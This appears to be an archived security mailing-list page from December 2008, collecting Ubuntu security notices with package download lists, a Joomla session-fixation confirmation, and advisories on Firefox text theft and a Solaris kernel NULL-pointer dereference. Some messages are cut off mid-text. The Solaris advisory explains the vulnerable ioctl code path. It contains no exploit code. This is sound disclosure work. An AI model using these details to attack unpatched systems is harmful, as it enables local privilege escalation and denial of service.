http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_amd64.deb
  Size/MD5:67296 1867fa5365e1877b2991f0012a5a0508

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_amd64.deb
  Size/MD5: 10470700 e782eb0e3ee75833b54f6bf6eb7ad587

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_i386.deb
  Size/MD5: 77284164 a71bc30bc1337cf8f764c4e34c0225bc

http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.19+nobinonly1-0ubuntu0.7.10.1_i386.deb
  Size/MD5:  3187094 ac6687331ea182a211af874e78d6ed17

http://security.ubuntu.c

[USN-693-1] LittleCMS vulnerability

2008-12-18 Thread Kees Cook
===
Ubuntu Security Notice USN-693-1  December 17, 2008
LittleCMS vulnerability
CVE-2008-5317
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  liblcms11.16-5ubuntu3.1

Ubuntu 8.04 LTS:
  liblcms11.16-7ubuntu1.1

Ubuntu 8.10:
  liblcms11.16-10ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that certain gamma operations in lcms were not
correctly bounds-checked.  If a user or automated system were tricked into
processing a malicious image, a remote attacker could crash applications
linked against liblcms1, leading to a denial of service, or possibly
execute arbitrary code with user privileges.


Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16-5ubuntu3.1.diff.gz
  Size/MD5:22270 1b07d069f29de87c948d397bb60f1c63
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16-5ubuntu3.1.dsc
  Size/MD5: 1053 52d8cf3618b1d68c4d847807145ff300
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.16.orig.tar.gz
  Size/MD5:   911546 b07b623f3e712373ff713fb32cf23651

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.1_amd64.deb
  Size/MD5:   674464 3ea01d1fb1e43a689d5aafe150702755

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.1_amd64.deb
  Size/MD5:   104172 ebeeb2d5b7dfc5df6cd759900d29f1bd

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.1_amd64.deb
  Size/MD5:58010 cfc5b383ff04d603270e5e129a100a35

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.1_amd64.deb
  Size/MD5:   160770 6ada95ac551daf18adf83eb0274eb15a

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.1_i386.deb
  Size/MD5:   625654 5bca706031d3f2150a08ae8d4f252b5d

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.1_i386.deb
  Size/MD5:98032 520b7d9b6f4e9ad58974ea574c594640

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.1_i386.deb
  Size/MD5:54488 fa816dc4c97ffc22d8200d390ccbfdc3

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.1_i386.deb
  Size/MD5:   151868 6a9d8575a81353384712b8b890c5d3db

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.1_lpia.deb
  Size/MD5:   627708 35acd977e4ca7c9ba06c5a19d708f6a5
http://ports.ubuntu.com/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.1_lpia.deb
  Size/MD5:96818 483f473b4ec36e5baa6cbd87644fb0db

http://ports.ubuntu.com/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.1_lpia.deb
  Size/MD5:54790 10144bba21291ab939b0cbdcc82b39a8

http://ports.ubuntu.com/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.1_lpia.deb
  Size/MD5:   148288 d638ba9bac48029ab63942b76086f9ec

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.1_powerpc.deb
  Size/MD5:   763170 75eb4df9ffc2343940521d61386232d8

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.1_powerpc.deb
  Size/MD5:   114370 0f56f9006b051e3f90ac255242ed55da

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.1_powerpc.deb
  Size/MD5:71750 313ced524c05c5b5524a43a6fe00b3b9

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.1_powerpc.deb
  Size/MD5:   169576 99c75e89acf4c53d2da192131832ab61

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.16-5ubuntu3.1_sparc.deb
  Size/MD5:   657440 32a668d688b45caf1b576d375067bab4

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.16-5ubuntu3.1_sparc.deb
  Size/MD5:   100078 272239660086573a11e9117150e990a4

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.16-5ubuntu3.1_sparc.deb
  Size/MD5:58090 d337f0c2012f27b06923b7e3bcc151a7

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/python-liblcms_1.16-5ubuntu3.1_sparc.deb
  Size/MD5:   160136 8b597e2f473e0df9a1d945f0e442940b

Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubun

Re: Joomla: Session hijacking vulnerability, CVE-2008-4122

2008-12-18 Thread darkz . gsa
Yes, I can reproduce this behavior. The application should reinitialize the 
cookie after the login but instead it will keep the previous cookie. An 
interesting thing this is valid only for the login_module, the administrator 
login page does not automatically redirect to HTTPS by configuration.


[USN-692-1] Gadu vulnerability

2008-12-18 Thread Kees Cook
===
Ubuntu Security Notice USN-692-1  December 17, 2008
ekg, libgadu vulnerability
CVE-2008-4776
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libgadu31:1.6+20051103-1ubuntu1.1

Ubuntu 7.10:
  libgadu31:1.7~rc2-2ubuntu0.7.10.1

Ubuntu 8.04 LTS:
  libgadu31:1.7~rc2-2ubuntu0.8.04.1

Ubuntu 8.10:
  libgadu31:1.8.0+r592-1ubuntu0.1

After a standard system upgrade you need to restart your session to effect
the necessary changes.

Details follow:

It was discovered that the Gadu library, used by some Instant Messaging
clients, did not correctly verify certain packet sizes from the server.
If a user connected to a malicious server, clients using Gadu could be
made to crash, leading to a denial of service.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.6+20051103-1ubuntu1.1.diff.gz
  Size/MD5:35354 ecdf6037647d24e67e420299f8bf3c2f

http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.6+20051103-1ubuntu1.1.dsc
  Size/MD5:  819 b6e90f714e487383e6d0bf67e98c8957

http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.6+20051103.orig.tar.gz
  Size/MD5:   503834 5bea3583499a8b9989016af9221b3a07

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.6+20051103-1ubuntu1.1_amd64.deb
  Size/MD5:   133146 85cfd1168568f5fd6edf848fc4f91d63

http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu3_1.6+20051103-1ubuntu1.1_amd64.deb
  Size/MD5:67886 874ac814a70dfae5a61bdad164b78c76

http://security.ubuntu.com/ubuntu/pool/universe/e/ekg/ekg_1.6+20051103-1ubuntu1.1_amd64.deb
  Size/MD5:   293566 06f87355ed9349e215af731b968501ce

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.6+20051103-1ubuntu1.1_i386.deb
  Size/MD5:   127014 5fd41a5c0bce4258e6f4bb82f51eaf1c

http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu3_1.6+20051103-1ubuntu1.1_i386.deb
  Size/MD5:64248 168adb89a8a875ccf6eb4302cab920a4

http://security.ubuntu.com/ubuntu/pool/universe/e/ekg/ekg_1.6+20051103-1ubuntu1.1_i386.deb
  Size/MD5:   273378 71859a4928ec1ce2ab8117fdda02aeeb

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.6+20051103-1ubuntu1.1_powerpc.deb
  Size/MD5:   134160 7b90cbde1411221e822c1952641f1379

http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu3_1.6+20051103-1ubuntu1.1_powerpc.deb
  Size/MD5:68306 a5485f32dc2d84340286d02a3161c713

http://security.ubuntu.com/ubuntu/pool/universe/e/ekg/ekg_1.6+20051103-1ubuntu1.1_powerpc.deb
  Size/MD5:   292000 f36a1f2c5ec9d0325532e86d0cc2150e

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.6+20051103-1ubuntu1.1_sparc.deb
  Size/MD5:   130728 58ffd885d139feb7b99fdffc5c59fb7b

http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu3_1.6+20051103-1ubuntu1.1_sparc.deb
  Size/MD5:66288 487246f4be79c8f597ebf7bc641e3a64

http://security.ubuntu.com/ubuntu/pool/universe/e/ekg/ekg_1.6+20051103-1ubuntu1.1_sparc.deb
  Size/MD5:   279900 0769cb58f813ac14c05ef99073b4e940

Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.7~rc2-2ubuntu0.7.10.1.diff.gz
  Size/MD5:37621 2630b60a3377c5041390339f0193e38e

http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.7~rc2-2ubuntu0.7.10.1.dsc
  Size/MD5:  898 164b0b16597df5d35869ac22e725d371
http://security.ubuntu.com/ubuntu/pool/main/e/ekg/ekg_1.7~rc2.orig.tar.gz
  Size/MD5:   514073 b4ea482130e163af1456699e2e6983d9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.7~rc2-2ubuntu0.7.10.1_amd64.deb
  Size/MD5:   135710 0f0852a49e3b5d61ad106b50b66254b4

http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu3_1.7~rc2-2ubuntu0.7.10.1_amd64.deb
  Size/MD5:70258 8e6f4f8c9311f66513c2b44c076080d6

http://security.ubuntu.com/ubuntu/pool/universe/e/ekg/ekg_1.7~rc2-2ubuntu0.7.10.1_amd64.deb
  Size/MD5:   303716 c0f68dbd421b0d8d1b6412258f0910ee

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/e/ekg/libgadu-dev_1.7~rc2-2ubuntu0.7.10.1_i386.deb
  Size/MD5:   131008 8ea62b04f2f1e792c73cfa3c970

Firefox cross-domain text theft (CESA-2008-011)

2008-12-18 Thread Chris Evans
Hi,

Firefoxes 2.0.0.19 and 3.0.5 fix a cross-domain theft of textual data.
The theft is via cross-domain information leaks in JavaScript error
messages for scripts executed via 

[TKADV2008-015] Sun Solaris SIOCGTUNPARAM IOCTL Kernel NULL pointer dereference

2008-12-18 Thread Tobias Klein

Please find attached a detailed advisory of the vulnerability.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-015.txt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Advisory:   Sun Solaris SIOCGTUNPARAM IOCTL Kernel NULL pointer
dereference
Advisory ID:TKADV2008-015
Revision:   1.0  
Release Date:   2008/12/17
Last Modified:  2008/12/17 
Date Reported:  2007/09/04
Author: Tobias Klein (tk at trapkit.de)
Affected Software:  Solaris 10 without patch 13-01 (SPARC)
Solaris 10 without patch 138889-01 (x86)
OpenSolaris < snv_77 (SPARC)
OpenSolaris < snv_77 (x86)   
Remotely Exploitable:   No
Locally Exploitable:Yes
Vendor URL: http://www.sun.com 
Vendor Status:  Vendor has released an updated version 
Patch development time: 471 days


==
Vulnerability Details: 
==

The kernel of Solaris contains a vulnerability in the code that handles 
SIOCGTUNPARAM IOCTL requests. Exploitation of this vulnerability can 
result in:

1) local denial of service attacks (system crash due to a kernel panic), or

   [ As all Solaris Zones (Containers) share the same kernel it is possible
   to crash the whole system (all Zones) even if the vulnerability is 
   triggered in an unprivileged non-global zone. ]

2) local execution of arbitrary code at the kernel level (complete system 
   compromise) on x86 platforms

   [ As all Solaris Zones (Containers) share the same kernel it is possible
   to escape from unprivileged non-global zones and compromise other non-
   global zones or the global zone. ]

The issue can be triggered by sending a specially crafted IOCTL request to 
the kernel.


==
Technical Details:
==

The following source code references are based on the kernel source code
available from http://www.opensolaris.org.

http://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/uts/common/
inet/ip/ip.c:

[...]
26692 void
26693 ip_process_ioctl(ipsq_t *ipsq, queue_t *q, mblk_t *mp, void *arg)
26694 {
[...]
26717 [1] ci.ci_ipif = NULL
[...]
26735 case TUN_CMD:
[...]
26740 [2]  err = ip_extract_tunreq(q, mp, &ci.ci_ipif, ip_process_ioctl);
26741  if (err != 0) {
26742ip_ioctl_finish(q, mp, err, IPI2MODE(ipip), NULL);
26743return;
26744   }
[...]
26782  if (!(ipip->ipi_flags & IPI_WR)) {
[...]
26788 [3] err = (*ipip->ipi_func)(ci.ci_ipif, ci.ci_sin, q, mp, ipip,
26789 ci.ci_lifr);
[...]

[1] The value of "ci.ci_ipif" is set to "NULL".
[2] When a SIOCGTUNPARAM IOCTL is called the switch case "TUN_CMD" is 
chosen and the "ip_extract_tunreq()" function gets called. 
[3] If the return value of the "ip_extract_tunreq()" function is 0 the 
"ci.ci_ipif" variable is later on used as the first parameter for the  
"ip_sioctl_tunparam()" function. 

http://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/uts/common/
inet/ip/ip_if.c:  

[...]
9468 int
9469 ip_sioctl_tunparam(ipif_t *ipif, sin_t *dummy_sin, queue_t *q, mblk_t 
   *mp,
9470   ip_ioctl_cmd_t *ipip, void *dummy_ifreq)
9471 { 
...
9499  [4]  ill = ipif->ipif_ill;
[...]

In the "ip_sioctl_tunparam()" function the first parameter "ipif" is used 
to reference some data (see [4]). 

It is possible to return from the "ip_extract_tunreq()" function (see [2]) 
with a return value of 0 while "ci.ci_ipif" is also still set to NULL. As 
"ipif" has the same value as "ci.ci_ipif", which is set to NULL, this leads
to a NULL pointer dereference (see [4]).

On x86 (32/64bit) platforms this Null pointer dereference can be exploited 
to execute arbitrary code at the kernel level. On SPARC platforms the 
vulnerability can "only" be used for a denial of service.


= 
Solution: 
=

This issue is addressed in the following patch releases from Sun:

SPARC Platform
- Solaris 10 with patch 13-01 or later
- OpenSolaris based upon builds snv_77 or later

x86 Platform
- Solaris 10 with patch 138889-01 or later
- OpenSolaris based upon builds snv_77 or later


 
History: 


  2007/09/04 - Vendor notified
  2007/09/05 - Vendor confirms the vulnerability
  2008/12/17 - Public disclosure of vulnerability details by Sun 
  2008/12/17 - Release date of this security advisory


 
Credits: 


  Vulnerability found and advisory written by Tobias Klein.


=== 
References: 
===

  [1] http://sunsolve.sun.com/search/document.do?assetkey=1-26-242266-1
  [2] http://www.trapkit.de/advisories/TKADV2008-015.txt


 
Changes: 


  Revision 0.1 - Initial draft release to the vendor
  Revision 1.0 - Public release
  

===
Disclaimer:
===

The information within this advisory may

[USN-690-1] Firefox and xulrunner vulnerabilities

2008-12-18 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-690-1  December 17, 2008
firefox-3.0, xulrunner-1.9 vulnerabilities
CVE-2008-5500, CVE-2008-5501, CVE-2008-5502, CVE-2008-5505,
CVE-2008-5506, CVE-2008-5507, CVE-2008-5508, CVE-2008-5510,
CVE-2008-5511, CVE-2008-5512, CVE-2008-5513
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  firefox-3.0 3.0.5+nobinonly-0ubuntu0.8.04.1
  xulrunner-1.9   1.9.0.5+nobinonly-0ubuntu0.8.04.1

Ubuntu 8.10:
  abrowser3.0.5+nobinonly-0ubuntu0.8.10.1
  firefox-3.0 3.0.5+nobinonly-0ubuntu0.8.10.1
  xulrunner-1.9   1.9.0.5+nobinonly-0ubuntu0.8.10.1

After a standard system upgrade you need to restart Firefox and any
applications that use xulrunner, such as Epiphany, to effect the necessary
changes.

Details follow:

Several flaws were discovered in the browser engine. These problems could allow
an attacker to crash the browser and possibly execute arbitrary code with user
privileges. (CVE-2008-5500, CVE-2008-5501, CVE-2008-5502)

It was discovered that Firefox did not properly handle persistent cookie data.
If a user were tricked into opening a malicious website, an attacker could
write persistent data in the user's browser and track the user across browsing
sessions. (CVE-2008-5505)

Marius Schilder discovered that Firefox did not properly handle redirects to
an outside domain when an XMLHttpRequest was made to a same-origin resource.
It's possible that sensitive information could be revealed in the
XMLHttpRequest response. (CVE-2008-5506)

Chris Evans discovered that Firefox did not properly protect a user's data when
accessing a same-domain Javascript URL that is redirected to an unparsable
Javascript off-site resource. If a user were tricked into opening a malicious
website, an attacker may be able to steal a limited amount of private data.
(CVE-2008-5507)

Chip Salzenberg, Justin Schuh, Tom Cross, and Peter William discovered Firefox
did not properly parse URLs when processing certain control characters.
(CVE-2008-5508)

Kojima Hajime discovered that Firefox did not properly handle an escaped null
character. An attacker may be able to exploit this flaw to bypass script
sanitization. (CVE-2008-5510)

Several flaws were discovered in the Javascript engine. If a user were tricked
into opening a malicious website, an attacker could exploit this to execute
arbitrary Javascript code within the context of another website or with chrome
privileges. (CVE-2008-5511, CVE-2008-5512)

Flaws were discovered in the session-restore feature of Firefox. If a user were
tricked into opening a malicious website, an attacker could exploit this to
perform cross-site scripting attacks or execute arbitrary Javascript code with
chrome privileges. (CVE-2008-5513)


Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.5+nobinonly-0ubuntu0.8.04.1.diff.gz
  Size/MD5:   105923 f12b085d54cf9974f59417c819369f7b

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.5+nobinonly-0ubuntu0.8.04.1.dsc
  Size/MD5: 2073 f77df6017c984d30a3d94852d612592c

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.5+nobinonly.orig.tar.gz
  Size/MD5: 11578151 aab85acc009ddf9e0949f6ef8021c629

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.5+nobinonly-0ubuntu0.8.04.1.diff.gz
  Size/MD5:77585 714fea2e00f4d2d225419b7714617379

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.5+nobinonly-0ubuntu0.8.04.1.dsc
  Size/MD5: 2138 29439d2544479c7d6071b77b5392beca

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.5+nobinonly.orig.tar.gz
  Size/MD5: 40094530 e717d276d7d511ec448c7a308ed38ea7

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.5+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:66036 1c795fc7e998798eb93166ad6749a782

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.5+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:66044 6a91da8f7b1e0f5e8bcee8290ffe8f79

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.5+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:66008 043213fede954207a951faa3fb3dbcef

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.5+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:65996 39449a48e9cf507448f4fe112a9f56